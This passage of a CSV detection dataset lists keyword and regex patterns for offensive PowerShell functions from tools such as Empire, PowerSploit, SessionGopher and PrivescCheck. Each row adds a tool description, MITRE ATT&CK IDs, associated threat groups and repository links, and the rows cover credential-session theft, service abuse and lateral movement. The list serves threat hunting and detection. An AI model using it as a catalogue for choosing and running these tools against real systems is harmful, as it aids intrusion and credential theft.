Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49520" "*Invoke-SensitiveHiveShadowCopyCheck*",".{0,1000}Invoke\-SensitiveHiveShadowCopyCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49521" "*Invoke-ServiceAbuse*",".{0,1000}Invoke\-ServiceAbuse.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Exploit vulnerable service permissions (does not require touching disk)","T1550 - T1555 - T1212 - T1558","N/A","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","49522" "*Invoke-ServiceAbuse*",".{0,1000}Invoke\-ServiceAbuse.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49523" "*Invoke-ServiceAbuse*",".{0,1000}Invoke\-ServiceAbuse.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","49524" 
"*Invoke-ServiceAbuse*",".{0,1000}Invoke\-ServiceAbuse.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","49525" "*Invoke-ServiceAbuse*",".{0,1000}Invoke\-ServiceAbuse.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49526" "*Invoke-ServiceCMD*",".{0,1000}Invoke\-ServiceCMD.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49527" "*Invoke-ServiceDisable*",".{0,1000}Invoke\-ServiceDisable.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49528" "*Invoke-Service-persistence.ps1*",".{0,1000}Invoke\-Service\-persistence\.ps1.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black 
Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","49529" "*Invoke-ServicesImagePermissionsCheck*",".{0,1000}Invoke\-ServicesImagePermissionsCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49530" "*Invoke-ServicesImagePermissionsCheck*",".{0,1000}Invoke\-ServicesImagePermissionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49531" "*Invoke-ServicesPermissionsCheck*",".{0,1000}Invoke\-ServicesPermissionsCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49532" "*Invoke-ServicesPermissionsCheck*",".{0,1000}Invoke\-ServicesPermissionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49533" "*Invoke-ServicesPermissionsRegistryCheck*",".{0,1000}Invoke\-ServicesPermissionsRegistryCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49534" "*Invoke-ServicesPermissionsRegistryCheck*",".{0,1000}Invoke\-ServicesPermissionsRegistryCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49535" "*Invoke-ServiceStart*",".{0,1000}Invoke\-ServiceStart.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49536" "*Invoke-ServiceStop*",".{0,1000}Invoke\-ServiceStop.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49537" "*Invoke-ServicesUnquotedPathCheck*",".{0,1000}Invoke\-ServicesUnquotedPathCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49538" 
"*Invoke-ServicesUnquotedPathCheck*",".{0,1000}Invoke\-ServicesUnquotedPathCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49539" "*Invoke-ServiceUserAdd*",".{0,1000}Invoke\-ServiceUserAdd.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - 
WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49540" "*Invoke-SessionExec *",".{0,1000}Invoke\-SessionExec\s.{0,1000}","offensive_tool_keyword","SessionExec","Execute commands in other Sessions","T1053 - T1569","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/SessionExec","1","0","N/A","N/A","10","1","86","14","2024-07-29T12:24:28Z","2024-07-21T15:32:07Z","49541" "*Invoke-SessionExec.ps1*",".{0,1000}Invoke\-SessionExec\.ps1.{0,1000}","offensive_tool_keyword","SessionExec","Execute commands in other Sessions","T1053 - T1569","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/SessionExec","1","1","N/A","N/A","10","1","86","14","2024-07-29T12:24:28Z","2024-07-21T15:32:07Z","49542" "*Invoke-SessionGopher*",".{0,1000}Invoke\-SessionGopher.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49543" "*Invoke-SessionGopher*",".{0,1000}Invoke\-SessionGopher.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49544" "*Invoke-SessionGopher*",".{0,1000}Invoke\-SessionGopher.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49545" "*Invoke-SessionGopher*",".{0,1000}Invoke\-SessionGopher.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49546" "*Invoke-SessionGopher*",".{0,1000}Invoke\-SessionGopher.{0,1000}","offensive_tool_keyword","SessionGopher","uses WMI to extract saved session information for remote access tools such as WinSCP - PuTTY - SuperPuTTY - FileZilla and Microsoft Remote Desktop. 
It can be run remotely or locally.","T1047 - T1003.008 - T1552.004 - T1555.003","TA0006","N/A","PYSA - DarkSide - Sphinx","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","1","N/A","N/A","10","10","1255","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z","49547" "*Invoke-SessionGopher.ps1*",".{0,1000}Invoke\-SessionGopher\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49548" "*Invoke-SessionHunter *",".{0,1000}Invoke\-SessionHunter\s.{0,1000}","offensive_tool_keyword","Invoke-SessionHunter","Retrieve and display information about active user sessions on remote 
computers. No admin privileges required","T1033 - T1078 - T1110","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-SessionHunter","1","0","N/A","N/A","7","2","183","20","2024-08-12T13:15:10Z","2023-08-13T13:22:05Z","49549" "*Invoke-SessionHunter*",".{0,1000}Invoke\-SessionHunter.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49550" "*Invoke-SessionHunter.ps1*",".{0,1000}Invoke\-SessionHunter\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49551" "*Invoke-SessionHunter.ps1*",".{0,1000}Invoke\-SessionHunter\.ps1.{0,1000}","offensive_tool_keyword","Invoke-SessionHunter","Retrieve and display information about active user sessions on remote computers. 
No admin privileges required","T1033 - T1078 - T1110","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-SessionHunter","1","1","N/A","N/A","7","2","183","20","2024-08-12T13:15:10Z","2023-08-13T13:22:05Z","49552" "*Invoke-ShadowSpray*",".{0,1000}Invoke\-ShadowSpray.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49553" "*invoke-sharefinder *",".{0,1000}invoke\-sharefinder\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49554" "*Invoke-ShareFinder -CheckShareAccess*",".{0,1000}Invoke\-ShareFinder\s\-CheckShareAccess.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","49555" 
